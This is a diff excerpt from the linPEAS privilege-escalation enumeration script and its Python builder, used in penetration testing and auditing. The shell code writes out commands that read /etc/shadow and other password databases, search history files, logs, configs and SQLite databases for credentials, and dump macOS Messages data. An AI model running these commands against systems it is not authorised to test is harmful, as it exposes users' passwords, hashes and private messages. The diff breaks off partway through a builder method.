+    grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+  else echo_not_found "/etc/security/capability.conf"
+  fi
+  echo ""
+fi
+
+##-- IF) Files with ACLs
+print_2title "Files with ACLs (limited to 50)"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls"
+( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+
+if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then  #Find ACL files in macos (veeeery slow)
+  ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED},"
+fi
+echo ""
+
+##-- IF) Files with ResourceFork
+#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER
+#  print_2title "Files with ResourceFork"
+#  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads"
+#  find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork"
+#fi
+#echo ""
+
+##-- IF) .sh files in PATH
+print_2title ".sh files in path"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path"
+echo $PATH | tr ":" "\n" | while read d; do
+  for f in $(find "$d" -name "*.sh" 2>/dev/null); do
+    if ! [ "$IAMROOT" ] && [ -O "$f" ]; then
+      echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED},"
+    elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits)
+      echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+    else
+      echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},";
+    fi
+  done
+done
+echo ""
+
+
+broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken)
+if [ "$broken_links" ] || [ "$DEBUG" ]; then 
+  print_2title "Broken links in path"
+  echo $PATH | tr ":" "\n" | while read d; do
+    find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},";
+  done
+  echo ""
+fi
+
+
+if [ "$MACPEAS" ]; then
+  print_2title "Unsigned Applications"
+  macosNotSigned /System/Applications
+fi
+
+##-- IF) Unexpected folders in /
+print_2title "Unexpected in root"
+if [ "$MACPEAS" ]; then
+  (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
+else
+  (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found
+fi
+echo ""
+
+##-- IF) Files (scripts) in /etc/profile.d/
+print_2title "Files (scripts) in /etc/profile.d/"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files"
+if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
+  (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/"
+  check_critial_root_path "/etc/profile"
+  check_critial_root_path "/etc/profile.d/"
+fi
+echo ""
+
+  ##-- IF) Files (scripts) in /etc/init.d/
+print_2title "Permissions in init, init.d, systemd, and rc.d"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d"
+if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS
+  check_critial_root_path "/etc/init/"
+  check_critial_root_path "/etc/init.d/"
+  check_critial_root_path "/etc/rc.d/init.d"
+  check_critial_root_path "/usr/local/etc/rc.d"
+  check_critial_root_path "/etc/rc.d"
+  check_critial_root_path "/etc/systemd/"
+  check_critial_root_path "/lib/systemd/"
+fi
+
+echo ""
+
+##-- IF) Hashes in passwd file
+print_list "Hashes inside passwd file? ........... "
+if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+
+##-- IF) Writable in passwd file
+print_list "Writable passwd file? ................ "
+if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+else echo_no
+fi
+
+##-- IF) Credentials in fstab
+print_list "Credentials in fstab/mtab? ........... "
+if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+
+##-- IF) Read shadow files
+print_list "Can I read shadow files? ............. "
+if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
+else echo_no
+fi
+
+print_list "Can I read shadow plists? ............ "
+possible_check=""
+(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
+
+print_list "Can I write shadow plists? ........... "
+possible_check=""
+(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no
+
+##-- IF) Read opasswd file
+print_list "Can I read opasswd file? ............. "
+if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo ""
+else echo_no
+fi
+
+##-- IF) network-scripts
+print_list "Can I write in network-scripts? ...... "
+if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+else echo_no
+fi
+
+##-- IF) Read root dir
+print_list "Can I read root folder? .............. "
+(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no
+echo ""
+
+##-- IF) Root files in home dirs
+print_2title "Searching root files in home dirs (limit 30)"
+(find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found
+echo ""
+
+##-- IF) Others files in my dirs
+if ! [ "$IAMROOT" ]; then
+  print_2title "Searching folders owned by me containing others files on it (limit 100)"
+  (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g"
+  echo ""
+fi
+
+##-- IF) Readable files belonging to root and not world readable
+if ! [ "$IAMROOT" ]; then
+  print_2title "Readable files belonging to root and readable by me but not world readable"
+  (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found
+  echo ""
+fi
+
+##-- IF) Modified interesting files into specific folders in the last 5mins
+print_2title "Modified interesting files in the last 5mins (limit 100)"
+find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED},"
+echo ""
+
+##-- IF) Writable log files
+print_2title "Writable log files (logrotten) (limit 100)"
+print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation"
+logrotate --version 2>/dev/null || echo_not_found "logrotate"
+lastWlogFolder="ImPOsSiBleeElastWlogFolder"
+logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100)
+printf "%s\n" "$logfind" | while read log; do
+  if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found
+    if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC;
+    elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case
+    elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log";
+    elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g";
+    fi
+  fi
+done
+
+echo ""
+
+##-- IF) Files inside my home
+print_2title "Files inside $HOME (limit 20)"
+(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found
+echo ""
+
+##-- IF) Files inside /home
+print_2title "Files inside others home (limit 20)"
+(find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found
+echo ""
+
+##-- IF) Mail applications
+print_2title "Searching installed mail applications"
+ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps"
+echo ""
+
+##-- IF) Mails
+print_2title "Mails (limit 50)"
+(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found
+echo ""
+
+##-- IF) Backup folders
+print_2title "Backup folders"
+printf "%s\n" "$backup_folders" | while read b ; do
+  ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g";
+  ls -l "$b" 2>/dev/null && echo ""
+done
+echo ""
+
+##-- IF) Backup files
+print_2title "Backup files (limited 100)"
+backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null)
+printf "%s\n" "$backs" | head -n 100 | while read b ; do
+  if [ -r "$b" ]; then
+    ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g";
+  fi;
+done
+echo ""
+
+##-- IF) DB files
+if [ "$MACPEAS" ]; then
+  print_2title "Reading messages database"
+  sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null
+  sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null
+  sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null
+
+fi
+print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)"
+FILECMD="$(command -v file 2>/dev/null)"
+if [ "$PSTORAGE_DATABASE" ]; then
+  printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
+    if [ "$FILECMD" ]; then
+      echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
+    else
+      echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g";
+    fi
+  done
+  SQLITEPYTHON=""
+  echo ""
+  printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do
+    if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd
+      if [ "$(command -v sqlite3 2>/dev/null)" ]; then
+        tables=$(sqlite3 $f ".tables" 2>/dev/null)
+        #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
+      elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then
+        SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null)
+        tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null)
+        #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g"
+      else
+        tables=""
+      fi
+      if [ "$tables" ] || [ "$DEBUG" ]; then
+          printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC
+          printf "%s\n" "$tables" | while read t; do
+          columns=""
+          # Search for credentials inside the table using sqlite3
+          if [ -z "$SQLITEPYTHON" ]; then
+            columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE")
+          # Search for credentials inside the table using python
+          else
+            columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null)
+          fi
+          #Check found columns for interesting fields
+          INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt")
+          if [ "$INTCOLUMN" ]; then
+            printf ${BLUE}"  --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g"
+            printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g"
+            (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head
+          fi
+          echo ""
+        done
+      fi
+    fi
+  done
+fi
+echo ""
+
+if [ "$MACPEAS" ]; then
+  print_2title "Downloaded Files"
+  sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|"
+fi
+
+##-- IF) Web files
+print_2title "Web files?(output limit)"
+ls -alhR /var/www/ 2>/dev/null | head
+ls -alhR /srv/www/htdocs/ 2>/dev/null | head
+ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head
+ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head
+echo ""
+
+##-- IF) All hidden files
+print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)"
+find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70
+echo ""
+
+##-- IF) Readable files in /tmp, /var/tmp, bachups
+print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)"
+filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70)
+printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done
+echo ""
+
+##-- IF) Interesting writable files by ownership or all
+if ! [ "$IAMROOT" ]; then
+  print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files"
+  #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all
+  obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
+  printf "%s\n" "$obmowbe" | while read entry; do
+    if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
+    elif echo "$entry" | grep -qE "$writeVB"; then
+      echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
+    else
+      echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
+    fi
+  done
+  echo ""
+fi
+
+##-- IF) Interesting writable files by group
+if ! [ "$IAMROOT" ]; then
+  print_2title "Interesting GROUP writable files (not in Home) (max 500)"
+  print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files"
+  for g in $(groups); do
+    iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500)
+    if [ "$iwfbg" ] || [ "$DEBUG" ]; then
+      printf "  Group $GREEN$g:\n$NC";
+      printf "%s\n" "$iwfbg" | while read entry; do
+        if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC;
+        elif echo "$entry" | grep -Eq "$writeVB"; then
+          echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW},"
+        else
+          echo "$entry" | sed -${E} "s,$writeB,${SED_RED},"
+        fi
+      done
+    fi
+  done
+  echo ""
+fi
+
+##-- IF) Passwords in history files
+if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then
+  print_2title "Searching passwords in history files"
+  printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done
+  echo ""
+fi
+
+##-- IF) Passwords in config PHP files
+if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then
+  print_2title "Searching passwords in config PHP files"
+  printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done
+  echo ""
+fi
+
+##-- IF) Passwords files in home
+if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then
+  print_2title "Searching *password* or *credential* files in home (limit 70)"
+  (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print "  #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
+  echo ""
+fi
+
+##-- IF) TTY passwords
+print_2title "Checking for TTY (sudo/su) passwords in audit logs"
+aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g"
+find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g"
+echo ""
+
+##-- IF) IPs inside logs
+if [ "$DEBUG" ]; then
+  print_2title "Searching IPs inside logs (limit 70)"
+  (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70
+  echo ""
+fi
+
+##-- IF) Passwords inside logs
+print_2title "Searching passwords inside logs (limit 70)"
+(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED},"
+echo ""
+
+if [ "$DEBUG" ]; then
+  ##-- IF) Emails inside logs
+  print_2title "Searching emails inside logs (limit 70)"
+  (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g"
+  echo ""
+fi
+
+
+
+
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
+  ##-- IF) Find possible files with passwords
+  print_2title "Searching passwords inside key folders (limit 70) - only PHP files"
+  intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null)
+  printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
+  echo ""
+
+  print_2title "Searching passwords inside key folders (limit 70) - no PHP files"
+  printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
+  echo ""
+
+  ##-- IF) Find possible files with passwords
+  print_2title "Searching possible password variables inside key folders (limit 140)"
+  timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
+  timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" &
+  wait
+  echo ""
+
+  ##-- IF) Find possible conf files with passwords
+  print_2title "Searching possible password in config files (if k8s secrets are found you need to read the file)"
+  ppicf=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ /etc /opt /tmp /private /Applications /mnt -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
+  printf "%s\n" "$ppicf" | while read f; do
+    if grep -qEiI 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' \"$f\" 2>/dev/null; then
+      echo "$ITALIC $f$NC"
+      grep -HnEiIo 'passwd.*|creden.*|^kind:\W?Secret|\Wenv:|\Wsecret:|\WsecretName:|^kind:\W?EncryptionConfiguration|\-\-encriyption\-provider\-config' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g"
+    fi
+  done
+  echo ""
+
+  ##-- IF) Find possible regexes
+  peass{REGEXES}
+fi

linPEAS/builder/src/fileRecord.py

@@ -4,6 +4,7 @@ class FileRecord:
     def __init__(self,
                 regex: str,
                 bad_regex: str=DEFAULTS["bad_regex"],
+                very_bad_regex: str=DEFAULTS["very_bad_regex"],
                 check_extra_path: str =DEFAULTS["check_extra_path"],
                 files: dict={},
                 good_regex: str=DEFAULTS["good_regex"],
@@ -19,6 +20,7 @@ class FileRecord:
 
         self.regex = regex
         self.bad_regex = bad_regex
+        self.very_bad_regex = very_bad_regex
         self.check_extra_path = check_extra_path
         self.files = [FileRecord(regex=fr["name"],**fr["value"]) for fr in files]
         self.good_regex = good_regex

linPEAS/builder/src/linpeasBaseBuilder.py

@@ -0,0 +1,37 @@
+from .yamlGlobals import (
+    LINPEAS_PARTS,
+    LINPEAS_BASE_PATH,
+    TEMPORARY_LINPEAS_BASE_PATH,
+    PEAS_CHECKS_MARKUP
+)
+
+class LinpeasBaseBuilder:
+    def __init__(self):
+        with open(LINPEAS_BASE_PATH, 'r') as file:
+            self.linpeas_base = file.read()
+
+    def build(self):
